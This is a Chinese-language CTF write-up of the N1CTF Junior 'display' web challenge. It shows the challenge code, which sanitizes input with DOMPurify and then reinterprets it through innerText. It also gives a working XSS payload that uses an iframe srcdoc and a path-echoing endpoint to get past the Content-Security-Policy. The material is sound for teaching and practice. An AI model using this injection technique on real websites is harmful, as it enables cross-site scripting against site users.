CTF-WEB: 利用iframe标签利用xss,waf过滤后再转换漏洞-- N1ctf Junior display

核心逻辑

js 复制代码
// 获取 URL 查询参数的值  
function getQueryParam(param) {  
    // 使用 URLSearchParams 从 URL 查询字符串中提取参数  
    const urlParams = new URLSearchParams(window.location.search);  
    // 返回查询参数的值  
    return urlParams.get(param);  
}  
  
// 使用 DOMPurify 对内容进行清理(sanitize),防止 XSS 攻击  
function sanitizeContent(text) {  
    // 只允许 <h1>, <h2> 标签和纯文本  
    const config = {  
        ALLOWED_TAGS: ['h1', 'h2']  // 配置允许的标签  
    };  
    // 返回清理后的内容,DOMPurify 会移除不允许的标签和潜在的危险内容  
    return DOMPurify.sanitize(text, config);  
}  
  
// 当 DOM 完全加载后执行的代码  
document.addEventListener("DOMContentLoaded", function() {  
    // 获取页面中输入框、按钮和内容显示区域的 DOM 元素  
    const textInput = document.getElementById('text-input');  
    const insertButton = document.getElementById('insert-btn');  
    const contentDisplay = document.getElementById('content-display');  
  
    // 获取 URL 查询参数中的 'text' 参数  
    const queryText = getQueryParam('text');  
  
    // 如果查询参数 'text' 存在  
    if (queryText) {  
        // 解码并清理传入的文本,atob 用于解码 base64,decodeURI 处理 URL 编码  
        const sanitizedText = sanitizeContent(atob(decodeURI(queryText)));  
  
        // 如果清理后的文本不为空  
        if (sanitizedText.length > 0) {  
            // 将清理后的文本设置为输入框的内容(innerHTML 用于处理 HTML 标签)  
            textInput.innerHTML = sanitizedText;  
  
            // 将清理后的文本设置为预览区的显示内容  
            contentDisplay.innerHTML = textInput.innerText;  
  
            // 启用插入按钮  
            insertButton.disabled = false;  
        } else {  
            // 如果清理后的文本为空,显示警告信息  
            textInput.innerText = "Only allow h1, h2 tags and plain text";  
        }  
    }  
});

过滤后再转换,sanitizedText在经过.innerText时其中的HTML实体会被转换为字符串。

当访问不存在页面时会返回路径名,可以利用这一点来构造脚本执行

复制代码
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Security-Policy: script-src 'self'; object-src 'none'; base-uri 'none';
Content-Type: text/plain; charset=utf-8
Content-Length: 17
ETag: W/"11-GF1FwKuoyTpdz1qrL+FpsG3KmnU"
Date: Fri, 14 Feb 2025 07:59:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5

/1 : invalid path

使用<iframe srcdoc=url>来在属性值中嵌入 HTML 内容,并在其中嵌套<script src=url>来绕过安全策略,使用**/// 闭合

html 复制代码
<iframe srcdoc="<script src='**/alert(`xss`)//'></script>"></iframe>
  • 注意字符串包裹方式依次为 " ' `
  • 因为js支持使用反引号包裹字符串

参考

2025 N1CTF Junior Web 方向全解 | J1rrY's Blog

相关推荐
Chockmans7 小时前
春秋云境CVE-2021-42897(保姆级教学)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2021-42897
四月天4321 小时前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全
菩提小狗1 天前
每日安全情报报告 · 2026-07-04
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗2 天前
每日安全情报报告 · 2026-07-03
网络安全·漏洞·cve·安全情报·每日安全
中云DDoS CC防护蔡蔡2 天前
短信验证码被攻击怎么办
运维·经验分享·http·网络安全·微信
菩提小狗2 天前
每日安全情报报告 · 2026-07-01
网络安全·漏洞·cve·安全情报·每日安全
忡黑梨2 天前
安装 Claude Code(使用 DeepSeek API)
网络·网络安全
零零信安19 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
憧憬成为web高手19 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub19 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全